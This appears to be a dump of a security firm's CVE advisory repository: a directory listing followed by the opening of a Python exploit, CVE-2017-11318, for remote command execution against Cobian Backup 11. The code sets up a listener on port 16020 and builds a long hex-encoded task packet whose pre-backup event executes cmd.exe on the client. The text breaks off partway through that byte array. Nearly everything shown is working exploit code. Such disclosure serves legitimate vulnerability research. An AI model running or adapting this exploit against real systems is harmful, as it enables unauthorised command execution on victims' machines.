├── 2017
├── CVE-2017-11318
│ ├── CVE-2017-11318.py
│ └── README.md
├── CVE-2017-14339
│ └── README.md
├── CVE-2017-6530
│ └── README.md
├── CVE-2017-6531
│ └── README.md
├── CVE-2017-6532
│ └── README.md
└── CVE-2017-8892
│ └── README.md
├── 2018
├── CVE-2018-10024
│ ├── CVE-2018-10024.py
│ └── README.md
├── CVE-2018-12482
│ └── README.md
├── CVE-2018-12483
│ └── README.md
├── CVE-2018-14473
│ └── README.md
├── CVE-2018-15503
│ └── README.md
├── CVE-2018-15610
│ └── README.md
└── CVE-2018-6792
│ └── README.md
├── 2019
├── CVE-2019-10687
│ └── README.md
├── CVE-2019-12385
│ ├── CVE-2019-12385.py
│ └── README.md
├── CVE-2019-12386
│ ├── CVE-2019-12386.html
│ ├── README.md
│ └── pwn.js
├── CVE-2019-12725
│ ├── CVE-2019-12725.py
│ └── README.md
├── CVE-2019-14459
│ └── README.md
├── CVE-2019-14666
│ ├── CVE-2019-14666.py
│ └── README.md
└── CVE-2019-18956
│ ├── CVE-2019-18956.sh
│ └── README.md
├── 2020
├── CVE-2020-12606
│ └── README.md
├── CVE-2020-28657
│ └── README.md
└── CVE-2020-35577
│ └── README.md
├── 2021
├── CVE-2021-33207
│ └── README.md
├── CVE-2021-33208
│ └── README.md
├── CVE-2021-33523
│ └── README.md
└── CVE-2021-33581
│ └── README.md
├── 2022
├── CVE-2022-30977
│ └── README.md
├── CVE-2022-30978
│ └── README.md
└── CVE-2022-43216
│ └── README.md
├── 2024
└── CVE-2024-21172
│ └── Readme.md
├── LICENSE
├── README.md
└── logo.png
/2017/CVE-2017-11318/CVE-2017-11318.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #
3 | # CVE-2017-11318 - Remote Command Execution
4 | #
5 | # Software: Cobian Backup 11
6 | # Author: Juan Manuel Fernandez (@TheXC3LL) from BlackArrow
7 | # Details: https://github.com/blackarrowsec/advisories/new/master/2017/CVE-2017-11318
8 | # Web: [www.blackarrow.net] - [www.tarlogic.com]
9 | #
10 |
11 |
12 | import socket
13 | import signal
14 | import sys
15 | from thread import *
16 |
17 | def signal_handler(signal, frame):
18 | print('You pressed Ctrl+C!')
19 | sys.exit(0)
20 | signal.signal(signal.SIGINT, signal_handler)
21 |
22 | ###### Socket data
23 | host = ''
24 | port = 16020 #Default
25 |
26 | ###### Server Packets
27 | iddle = "490044004c0045002c002c000d000a00"
28 |
29 | get_options = "4700450054005f004f005000540049004f004e0053002c002c000d000a00"
30 |
31 | password_ok = "500041005300530057004f00520044005f004f004b002c002c000d000a00"
32 |
33 | task_template = [
34 | 0x55, 0x00, 0x50, 0x00, 0x44, 0x00, 0x41, 0x00,
35 | 0x54, 0x00, 0x45, 0x00, 0x5f, 0x00, 0x4c, 0x00,
36 | 0x49, 0x00, 0x53, 0x00, 0x54, 0x00, 0x2c, 0x00,
37 | 0x22, 0x00, 0x7b, 0x00, 0x31, 0x00, 0x31, 0x00,
38 | 0x2f, 0x00, 0x2f, 0x00, 0x2c, 0x00, 0x49, 0x00,
39 | 0x64, 0x00, 0x3d, 0x00, 0x7b, 0x00, 0x45, 0x00,
40 | 0x37, 0x00, 0x45, 0x00, 0x43, 0x00, 0x46, 0x00,
41 | 0x34, 0x00, 0x32, 0x00, 0x44, 0x00, 0x2d, 0x00,
42 | 0x37, 0x00, 0x38, 0x00, 0x45, 0x00, 0x34, 0x00,
43 | 0x2d, 0x00, 0x34, 0x00, 0x32, 0x00, 0x34, 0x00,
44 | 0x38, 0x00, 0x2d, 0x00, 0x42, 0x00, 0x37, 0x00,
45 | 0x45, 0x00, 0x45, 0x00, 0x2d, 0x00, 0x33, 0x00,
46 | 0x38, 0x00, 0x39, 0x00, 0x35, 0x00, 0x33, 0x00,
47 | 0x36, 0x00, 0x44, 0x00, 0x38, 0x00, 0x42, 0x00,
48 | 0x44, 0x00, 0x33, 0x00, 0x38, 0x00, 0x7d, 0x00,
49 | 0x2c, 0x00, 0x4e, 0x00, 0x61, 0x00, 0x6d, 0x00,
50 | 0x65, 0x00, 0x3d, 0x00, 0x7b, 0x00, 0x45, 0x00,
51 | 0x37, 0x00, 0x45, 0x00, 0x43, 0x00, 0x46, 0x00,
52 | 0x34, 0x00, 0x32, 0x00, 0x44, 0x00, 0x2d, 0x00,
53 | 0x37, 0x00, 0x38, 0x00, 0x45, 0x00, 0x34, 0x00,
54 | 0x2d, 0x00, 0x34, 0x00, 0x32, 0x00, 0x34, 0x00,
55 | 0x38, 0x00, 0x2d, 0x00, 0x42, 0x00, 0x37, 0x00,
56 | 0x45, 0x00, 0x45, 0x00, 0x2d, 0x00, 0x33, 0x00,
57 | 0x38, 0x00, 0x39, 0x00, 0x35, 0x00, 0x33, 0x00,
58 | 0x36, 0x00, 0x44, 0x00, 0x38, 0x00, 0x42, 0x00,
59 | 0x44, 0x00, 0x33, 0x00, 0x38, 0x00, 0x7d, 0x00,
60 | 0x2c, 0x00, 0x47, 0x00, 0x72, 0x00, 0x6f, 0x00,
61 | 0x75, 0x00, 0x70, 0x00, 0x3d, 0x00, 0x2c, 0x00,
62 | 0x45, 0x00, 0x6e, 0x00, 0x61, 0x00, 0x62, 0x00,
63 | 0x6c, 0x00, 0x65, 0x00, 0x64, 0x00, 0x3d, 0x00,
64 | 0x74, 0x00, 0x72, 0x00, 0x75, 0x00, 0x65, 0x00,
65 | 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 0x49, 0x00,
66 | 0x6e, 0x00, 0x63, 0x00, 0x6c, 0x00, 0x75, 0x00,
67 | 0x64, 0x00, 0x65, 0x00, 0x20, 0x00, 0x73, 0x00,
68 | 0x75, 0x00, 0x62, 0x00, 0x64, 0x00, 0x69, 0x00,
69 | 0x72, 0x00, 0x65, 0x00, 0x63, 0x00, 0x74, 0x00,
70 | 0x6f, 0x00, 0x72, 0x00, 0x69, 0x00, 0x65, 0x00,
71 | 0x73, 0x00, 0x3d, 0x00, 0x74, 0x00, 0x72, 0x00,
72 | 0x75, 0x00, 0x65, 0x00, 0x22, 0x00, 0x22, 0x00,
73 | 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 0x43, 0x00,
74 | 0x72, 0x00, 0x65, 0x00, 0x61, 0x00, 0x74, 0x00,
75 | 0x65, 0x00, 0x20, 0x00, 0x73, 0x00, 0x65, 0x00,
76 | 0x70, 0x00, 0x61, 0x00, 0x72, 0x00, 0x61, 0x00,
77 | 0x74, 0x00, 0x65, 0x00, 0x64, 0x00, 0x20, 0x00,
78 | 0x62, 0x00, 0x61, 0x00, 0x63, 0x00, 0x6b, 0x00,
79 | 0x75, 0x00, 0x70, 0x00, 0x73, 0x00, 0x3d, 0x00,
80 | 0x74, 0x00, 0x72, 0x00, 0x75, 0x00, 0x65, 0x00,
81 | 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00,
82 | 0x22, 0x00, 0x55, 0x00, 0x73, 0x00, 0x65, 0x00,
83 | 0x20, 0x00, 0x61, 0x00, 0x74, 0x00, 0x74, 0x00,
84 | 0x72, 0x00, 0x69, 0x00, 0x62, 0x00, 0x75, 0x00,
85 | 0x74, 0x00, 0x65, 0x00, 0x73, 0x00, 0x3d, 0x00,
86 | 0x74, 0x00, 0x72, 0x00, 0x75, 0x00, 0x65, 0x00,
87 | 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00,
88 | 0x22, 0x00, 0x55, 0x00, 0x73, 0x00, 0x65, 0x00,
89 | 0x20, 0x00, 0x56, 0x00, 0x53, 0x00, 0x43, 0x00,
90 | 0x3d, 0x00, 0x74, 0x00, 0x72, 0x00, 0x75, 0x00,
91 | 0x65, 0x00, 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00,
92 | 0x22, 0x00, 0x22, 0x00, 0x42, 0x00, 0x61, 0x00,
93 | 0x63, 0x00, 0x6b, 0x00, 0x75, 0x00, 0x70, 0x00,
94 | 0x20, 0x00, 0x74, 0x00, 0x79, 0x00, 0x70, 0x00,
95 | 0x65, 0x00, 0x3d, 0x00, 0x30, 0x00, 0x22, 0x00,
96 | 0x22, 0x00, 0x2c, 0x00, 0x50, 0x00, 0x72, 0x00,
97 | 0x69, 0x00, 0x6f, 0x00, 0x72, 0x00, 0x69, 0x00,
98 | 0x74, 0x00, 0x79, 0x00, 0x3d, 0x00, 0x30, 0x00,
99 | 0x2c, 0x00, 0x53, 0x00, 0x6f, 0x00, 0x75, 0x00,
100 | 0x72, 0x00, 0x63, 0x00, 0x65, 0x00, 0x3d, 0x00,
101 | 0x2c, 0x00, 0x44, 0x00, 0x65, 0x00, 0x73, 0x00,
102 | 0x74, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x61, 0x00,
103 | 0x74, 0x00, 0x69, 0x00, 0x6f, 0x00, 0x6e, 0x00,
104 | 0x3d, 0x00, 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00,
105 | 0x53, 0x00, 0x63, 0x00, 0x68, 0x00, 0x65, 0x00,
106 | 0x64, 0x00, 0x75, 0x00, 0x6c, 0x00, 0x65, 0x00,
107 | 0x20, 0x00, 0x74, 0x00, 0x79, 0x00, 0x70, 0x00,
108 | 0x65, 0x00, 0x3d, 0x00, 0x31, 0x00, 0x22, 0x00,
109 | 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00,
110 | 0x53, 0x00, 0x65, 0x00, 0x6c, 0x00, 0x65, 0x00,
111 | 0x63, 0x00, 0x74, 0x00, 0x20, 0x00, 0x64, 0x00,
112 | 0x61, 0x00, 0x79, 0x00, 0x73, 0x00, 0x20, 0x00,
113 | 0x6f, 0x00, 0x66, 0x00, 0x20, 0x00, 0x74, 0x00,
114 | 0x68, 0x00, 0x65, 0x00, 0x20, 0x00, 0x77, 0x00,
115 | 0x65, 0x00, 0x65, 0x00, 0x6b, 0x00, 0x3d, 0x00,
116 | 0x66, 0x00, 0x61, 0x00, 0x6c, 0x00, 0x73, 0x00,
117 | 0x65, 0x00, 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00,
118 | 0x22, 0x00, 0x22, 0x00, 0x4f, 0x00, 0x72, 0x00,
119 | 0x64, 0x00, 0x65, 0x00, 0x72, 0x00, 0x20, 0x00,
120 | 0x6f, 0x00, 0x66, 0x00, 0x20, 0x00, 0x44, 0x00,
121 | 0x61, 0x00, 0x79, 0x00, 0x20, 0x00, 0x6f, 0x00,
122 | 0x66, 0x00, 0x20, 0x00, 0x74, 0x00, 0x68, 0x00,
123 | 0x65, 0x00, 0x20, 0x00, 0x77, 0x00, 0x65, 0x00,
124 | 0x65, 0x00, 0x6b, 0x00, 0x3d, 0x00, 0x31, 0x00,
125 | 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00,
126 | 0x22, 0x00, 0x44, 0x00, 0x61, 0x00, 0x79, 0x00,
127 | 0x20, 0x00, 0x6f, 0x00, 0x66, 0x00, 0x20, 0x00,
128 | 0x74, 0x00, 0x68, 0x00, 0x65, 0x00, 0x20, 0x00,
129 | 0x77, 0x00, 0x65, 0x00, 0x65, 0x00, 0x6b, 0x00,
130 | 0x3d, 0x00, 0x31, 0x00, 0x22, 0x00, 0x22, 0x00,
131 | 0x2c, 0x00, 0x44, 0x00, 0x61, 0x00, 0x74, 0x00,
132 | 0x65, 0x00, 0x2f, 0x00, 0x54, 0x00, 0x69, 0x00,
133 | 0x6d, 0x00, 0x65, 0x00, 0x3d, 0x00, 0x30, 0x00,
134 | 0x31, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
135 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x31, 0x00,
136 | 0x31, 0x00, 0x31, 0x00, 0x30, 0x00, 0x30, 0x00,
137 | 0x31, 0x00, 0x30, 0x00, 0x30, 0x00, 0x31, 0x00,
138 | 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x30, 0x00,
139 | 0x31, 0x00, 0x31, 0x00, 0x30, 0x00, 0x30, 0x00,
140 | 0x30, 0x00, 0x31, 0x00, 0x30, 0x00, 0x31, 0x00,
141 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
142 | 0x31, 0x00, 0x31, 0x00, 0x30, 0x00, 0x31, 0x00,
143 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
144 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
145 | 0x31, 0x00, 0x30, 0x00, 0x31, 0x00, 0x31, 0x00,
146 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x31, 0x00,
147 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x31, 0x00,
148 | 0x30, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00,
149 | 0x31, 0x00, 0x31, 0x00, 0x30, 0x00, 0x2c, 0x00,
150 | 0x22, 0x00, 0x22, 0x00, 0x44, 0x00, 0x61, 0x00,
151 | 0x79, 0x00, 0x20, 0x00, 0x6f, 0x00, 0x66, 0x00,
152 | 0x20, 0x00, 0x74, 0x00, 0x68, 0x00, 0x65, 0x00,
153 | 0x20, 0x00, 0x6d, 0x00, 0x6f, 0x00, 0x6e, 0x00,
154 | 0x74, 0x00, 0x68, 0x00, 0x3d, 0x00, 0x31, 0x00,
155 | 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x4d, 0x00,
156 | 0x6f, 0x00, 0x6e, 0x00, 0x74, 0x00, 0x68, 0x00,
157 | 0x3d, 0x00, 0x31, 0x00, 0x2c, 0x00, 0x54, 0x00,
158 | 0x69, 0x00, 0x6d, 0x00, 0x65, 0x00, 0x72, 0x00,
159 | 0x3d, 0x00, 0x31, 0x00, 0x38, 0x00, 0x30, 0x00,
160 | 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 0x54, 0x00,
161 | 0x69, 0x00, 0x6d, 0x00, 0x65, 0x00, 0x72, 0x00,
162 | 0x20, 0x00, 0x66, 0x00, 0x72, 0x00, 0x6f, 0x00,
163 | 0x6d, 0x00, 0x3d, 0x00, 0x30, 0x00, 0x31, 0x00,
164 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
165 | 0x30, 0x00, 0x30, 0x00, 0x31, 0x00, 0x31, 0x00,
166 | 0x31, 0x00, 0x30, 0x00, 0x30, 0x00, 0x31, 0x00,
167 | 0x30, 0x00, 0x30, 0x00, 0x31, 0x00, 0x31, 0x00,
168 | 0x31, 0x00, 0x31, 0x00, 0x30, 0x00, 0x31, 0x00,
169 | 0x31, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
170 | 0x31, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
171 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
172 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
173 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
174 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
175 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
176 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
177 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
178 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
179 | 0x30, 0x00, 0x30, 0x00, 0x22, 0x00, 0x22, 0x00,
180 | 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 0x54, 0x00,
181 | 0x69, 0x00, 0x6d, 0x00, 0x65, 0x00, 0x72, 0x00,
182 | 0x20, 0x00, 0x74, 0x00, 0x6f, 0x00, 0x3d, 0x00,
183 | 0x30, 0x00, 0x31, 0x00, 0x30, 0x00, 0x30, 0x00,
184 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
185 | 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x30, 0x00,
186 | 0x30, 0x00, 0x31, 0x00, 0x30, 0x00, 0x30, 0x00,
187 | 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00,
188 | 0x30, 0x00, 0x31, 0x00, 0x31, 0x00, 0x30, 0x00,
189 | 0x30, 0x00, 0x30, 0x00, 0x31, 0x00, 0x31, 0x00,
190 | 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00,
191 | 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00,
192 | 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00,
193 | 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x30, 0x00,
194 | 0x30, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00,
195 | 0x31, 0x00, 0x30, 0x00, 0x31, 0x00, 0x31, 0x00,
196 | 0x31, 0x00, 0x30, 0x00, 0x31, 0x00, 0x30, 0x00,
197 | 0x30, 0x00, 0x30, 0x00, 0x31, 0x00, 0x31, 0x00,
198 | 0x30, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00,
199 | 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00,
200 | 0x22, 0x00, 0x46, 0x00, 0x75, 0x00, 0x6c, 0x00,
201 | 0x6c, 0x00, 0x20, 0x00, 0x63, 0x00, 0x6f, 0x00,
202 | 0x70, 0x00, 0x69, 0x00, 0x65, 0x00, 0x73, 0x00,
203 | 0x3d, 0x00, 0x30, 0x00, 0x22, 0x00, 0x22, 0x00,
204 | 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 0x44, 0x00,
205 | 0x69, 0x00, 0x66, 0x00, 0x66, 0x00, 0x65, 0x00,
206 | 0x72, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x74, 0x00,
207 | 0x61, 0x00, 0x6c, 0x00, 0x20, 0x00, 0x63, 0x00,
208 | 0x6f, 0x00, 0x70, 0x00, 0x69, 0x00, 0x65, 0x00,
209 | 0x73, 0x00, 0x3d, 0x00, 0x30, 0x00, 0x22, 0x00,
210 | 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00,
211 | 0x4f, 0x00, 0x6e, 0x00, 0x65, 0x00, 0x20, 0x00,
212 | 0x66, 0x00, 0x75, 0x00, 0x6c, 0x00, 0x6c, 0x00,
213 | 0x20, 0x00, 0x65, 0x00, 0x76, 0x00, 0x65, 0x00,
214 | 0x72, 0x00, 0x79, 0x00, 0x3d, 0x00, 0x30, 0x00,
215 | 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00,
216 | 0x22, 0x00, 0x55, 0x00,
217 | 0x73, 0x00, 0x65, 0x00, 0x20, 0x00, 0x66, 0x00,
218 | 0x69, 0x00, 0x78, 0x00, 0x65, 0x00, 0x64, 0x00,
219 | 0x20, 0x00, 0x64, 0x00, 0x61, 0x00, 0x79, 0x00,
220 | 0x3d, 0x00, 0x66, 0x00, 0x61, 0x00, 0x6c, 0x00,
221 | 0x73, 0x00, 0x65, 0x00, 0x22, 0x00, 0x22, 0x00,
222 | 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 0x46, 0x00,
223 | 0x69, 0x00, 0x78, 0x00, 0x65, 0x00, 0x64, 0x00,
224 | 0x20, 0x00, 0x64, 0x00, 0x61, 0x00, 0x79, 0x00,
225 | 0x3d, 0x00, 0x31, 0x00, 0x22, 0x00, 0x22, 0x00,
226 | 0x2c, 0x00, 0x43, 0x00, 0x6f, 0x00, 0x6d, 0x00,
227 | 0x70, 0x00, 0x72, 0x00, 0x65, 0x00, 0x73, 0x00,
228 | 0x73, 0x00, 0x69, 0x00, 0x6f, 0x00, 0x6e, 0x00,
229 | 0x3d, 0x00, 0x30, 0x00, 0x2c, 0x00, 0x22, 0x00,
230 | 0x22, 0x00, 0x43, 0x00, 0x6f, 0x00, 0x6d, 0x00,
231 | 0x70, 0x00, 0x72, 0x00, 0x65, 0x00, 0x73, 0x00,
232 | 0x73, 0x00, 0x20, 0x00, 0x69, 0x00, 0x6e, 0x00,
233 | 0x64, 0x00, 0x69, 0x00, 0x76, 0x00, 0x69, 0x00,
234 | 0x64, 0x00, 0x75, 0x00, 0x61, 0x00, 0x6c, 0x00,
235 | 0x6c, 0x00, 0x79, 0x00, 0x3d, 0x00, 0x66, 0x00,
236 | 0x61, 0x00, 0x6c, 0x00, 0x73, 0x00, 0x65, 0x00,
237 | 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x53, 0x00,
238 | 0x70, 0x00, 0x6c, 0x00, 0x69, 0x00, 0x74, 0x00,
239 | 0x3d, 0x00, 0x30, 0x00, 0x2c, 0x00, 0x22, 0x00,
240 | 0x22, 0x00, 0x43, 0x00, 0x75, 0x00, 0x73, 0x00,
241 | 0x74, 0x00, 0x6f, 0x00, 0x6d, 0x00, 0x20, 0x00,
242 | 0x73, 0x00, 0x69, 0x00, 0x7a, 0x00, 0x65, 0x00,
243 | 0x3d, 0x00, 0x34, 0x00, 0x33, 0x00, 0x30, 0x00,
244 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
245 | 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x22, 0x00,
246 | 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00,
247 | 0x43, 0x00, 0x6f, 0x00, 0x6d, 0x00, 0x6d, 0x00,
248 | 0x65, 0x00, 0x6e, 0x00, 0x74, 0x00, 0x3d, 0x00,
249 | 0x43, 0x00, 0x6f, 0x00, 0x62, 0x00, 0x69, 0x00,
250 | 0x61, 0x00, 0x6e, 0x00, 0x20, 0x00, 0x42, 0x00,
251 | 0x61, 0x00, 0x63, 0x00, 0x6b, 0x00, 0x75, 0x00,
252 | 0x70, 0x00, 0x20, 0x00, 0x31, 0x00, 0x31, 0x00,
253 | 0x20, 0x00, 0x47, 0x00, 0x72, 0x00, 0x61, 0x00,
254 | 0x76, 0x00, 0x69, 0x00, 0x74, 0x00, 0x79, 0x00,
255 | 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x45, 0x00,
256 | 0x6e, 0x00, 0x63, 0x00, 0x72, 0x00, 0x79, 0x00,
257 | 0x70, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6f, 0x00,
258 | 0x6e, 0x00, 0x3d, 0x00, 0x30, 0x00, 0x2c, 0x00,
259 | 0x50, 0x00, 0x61, 0x00, 0x73, 0x00, 0x73, 0x00,
260 | 0x70, 0x00, 0x68, 0x00, 0x72, 0x00, 0x61, 0x00,
261 | 0x73, 0x00, 0x65, 0x00, 0x3d, 0x00, 0x59, 0x00,
262 | 0x67, 0x00, 0x42, 0x00, 0x6c, 0x00, 0x41, 0x00,
263 | 0x47, 0x00, 0x41, 0x00, 0x41, 0x00, 0x63, 0x00,
264 | 0x51, 0x00, 0x42, 0x00, 0x33, 0x00, 0x41, 0x00,
265 | 0x47, 0x00, 0x73, 0x00, 0x41, 0x00, 0x61, 0x00,
266 | 0x77, 0x00, 0x42, 0x00, 0x37, 0x00, 0x41, 0x00,
267 | 0x48, 0x00, 0x6b, 0x00, 0x41, 0x00, 0x61, 0x00,
268 | 0x51, 0x00, 0x41, 0x00, 0x35, 0x00, 0x41, 0x00,
269 | 0x48, 0x00, 0x77, 0x00, 0x41, 0x00, 0x42, 0x00,
270 | 0x77, 0x00, 0x41, 0x00, 0x44, 0x00, 0x41, 0x00,
271 | 0x41, 0x00, 0x30, 0x00, 0x41, 0x00, 0x63, 0x00,
272 | 0x77, 0x00, 0x42, 0x00, 0x78, 0x00, 0x41, 0x00,
273 | 0x48, 0x00, 0x55, 0x00, 0x41, 0x00, 0x65, 0x00,
274 | 0x77, 0x00, 0x41, 0x00, 0x64, 0x00, 0x41, 0x00,
275 | 0x42, 0x00, 0x41, 0x00, 0x41, 0x00, 0x63, 0x00,
276 | 0x67, 0x00, 0x42, 0x00, 0x2b, 0x00, 0x41, 0x00,
277 | 0x48, 0x00, 0x49, 0x00, 0x41, 0x00, 0x65, 0x00,
278 | 0x51, 0x00, 0x41, 0x00, 0x45, 0x00, 0x41, 0x00,
279 | 0x41, 0x00, 0x67, 0x00, 0x41, 0x00, 0x41, 0x00,
280 | 0x41, 0x00, 0x42, 0x00, 0x34, 0x00, 0x41, 0x00,
281 | 0x42, 0x00, 0x30, 0x00, 0x41, 0x00, 0x61, 0x00,
282 | 0x51, 0x00, 0x41, 0x00, 0x4a, 0x00, 0x41, 0x00,
283 | 0x48, 0x00, 0x4d, 0x00, 0x41, 0x00, 0x64, 0x00,
284 | 0x77, 0x00, 0x42, 0x00, 0x6f, 0x00, 0x41, 0x00,
285 | 0x43, 0x00, 0x77, 0x00, 0x41, 0x00, 0x43, 0x00,
286 | 0x51, 0x00, 0x41, 0x00, 0x42, 0x00, 0x41, 0x00,
287 | 0x48, 0x00, 0x55, 0x00, 0x41, 0x00, 0x44, 0x00,
288 | 0x77, 0x00, 0x42, 0x00, 0x2b, 0x00, 0x41, 0x00,
289 | 0x41, 0x00, 0x6b, 0x00, 0x41, 0x00, 0x63, 0x00,
290 | 0x41, 0x00, 0x42, 0x00, 0x37, 0x00, 0x41, 0x00,
291 | 0x47, 0x00, 0x4d, 0x00, 0x41, 0x00, 0x63, 0x00,
292 | 0x77, 0x00, 0x41, 0x00, 0x44, 0x00, 0x41, 0x00,
293 | 0x44, 0x00, 0x38, 0x00, 0x41, 0x00, 0x66, 0x00,
294 | 0x41, 0x00, 0x41, 0x00, 0x6d, 0x00, 0x41, 0x00,
295 | 0x41, 0x00, 0x3d, 0x00, 0x3d, 0x00, 0x2c, 0x00,
296 | 0x45, 0x00, 0x78, 0x00, 0x63, 0x00, 0x6c, 0x00,
297 | 0x75, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6f, 0x00,
298 | 0x6e, 0x00, 0x73, 0x00, 0x3d, 0x00, 0x2c, 0x00,
299 | 0x49, 0x00, 0x6e, 0x00, 0x63, 0x00, 0x6c, 0x00,
300 | 0x75, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6f, 0x00,
301 | 0x6e, 0x00, 0x73, 0x00, 0x3d, 0x00, 0x2c, 0x00,
302 | 0x22, 0x00, 0x22, 0x00, 0x50, 0x00, 0x72, 0x00,
303 | 0x65, 0x00, 0x20, 0x00, 0x62, 0x00, 0x61, 0x00,
304 | 0x63, 0x00, 0x6b, 0x00, 0x75, 0x00, 0x70, 0x00,
305 | 0x20, 0x00, 0x65, 0x00, 0x76, 0x00, 0x65, 0x00,
306 | 0x6e, 0x00, 0x74, 0x00, 0x73, 0x00, 0x3d, 0x00,
307 | 0x22, 0x00, 0x22, 0x00, 0x22, 0x00, 0x22, 0x00,
308 | 0x45, 0x00, 0x58, 0x00, 0x45, 0x00, 0x43, 0x00,
309 | 0x55, 0x00, 0x54, 0x00, 0x45, 0x00, 0x2c, 0x00,
310 | 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x57, 0x00,
311 | 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00,
312 | 0x77, 0x00, 0x73, 0x00, 0x5c, 0x00, 0x53, 0x00,
313 | 0x79, 0x00, 0x73, 0x00, 0x74, 0x00, 0x65, 0x00,
314 | 0x6d, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5c, 0x00,
315 | 0x63, 0x00, 0x6d, 0x00, 0x64, 0x00, 0x2e, 0x00,
316 | 0x65, 0x00, 0x78, 0x00, 0x65, 0x00, 0x2c, 0x00,
317 | 0x22, 0x00, 0x22, 0x00, 0x22, 0x00, 0x22, 0x00,
318 | 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00,
319 | 0x22, 0x00, 0x50, 0x00, 0x6f, 0x00, 0x73, 0x00,
320 | 0x74, 0x00, 0x20, 0x00, 0x62, 0x00, 0x61, 0x00,
321 | 0x63, 0x00, 0x6b, 0x00, 0x75, 0x00, 0x70, 0x00,
322 | 0x20, 0x00, 0x65, 0x00, 0x76, 0x00, 0x65, 0x00,
323 | 0x6e, 0x00, 0x74, 0x00, 0x73, 0x00, 0x3d, 0x00,
324 | 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00,
325 | 0x22, 0x00, 0x41, 0x00, 0x62, 0x00, 0x6f, 0x00,
326 | 0x72, 0x00, 0x74, 0x00, 0x20, 0x00, 0x69, 0x00,
327 | 0x66, 0x00, 0x20, 0x00, 0x70, 0x00, 0x72, 0x00,
328 | 0x65, 0x00, 0x2d, 0x00, 0x65, 0x00, 0x76, 0x00,
329 | 0x65, 0x00, 0x6e, 0x00, 0x74, 0x00, 0x20, 0x00,
330 | 0x66, 0x00, 0x61, 0x00, 0x69, 0x00, 0x6c, 0x00,
331 | 0x73, 0x00, 0x3d, 0x00, 0x66, 0x00, 0x61, 0x00,
332 | 0x6c, 0x00, 0x73, 0x00, 0x65, 0x00, 0x22, 0x00,
333 | 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00,
334 | 0x41, 0x00, 0x62, 0x00, 0x6f, 0x00, 0x72, 0x00,
335 | 0x74, 0x00, 0x20, 0x00, 0x69, 0x00, 0x66, 0x00,
336 | 0x20, 0x00, 0x70, 0x00, 0x6f, 0x00, 0x73, 0x00,
337 | 0x74, 0x00, 0x2d, 0x00, 0x65, 0x00, 0x76, 0x00,
338 | 0x65, 0x00, 0x6e, 0x00, 0x74, 0x00, 0x20, 0x00,
339 | 0x66, 0x00, 0x61, 0x00, 0x69, 0x00, 0x6c, 0x00,
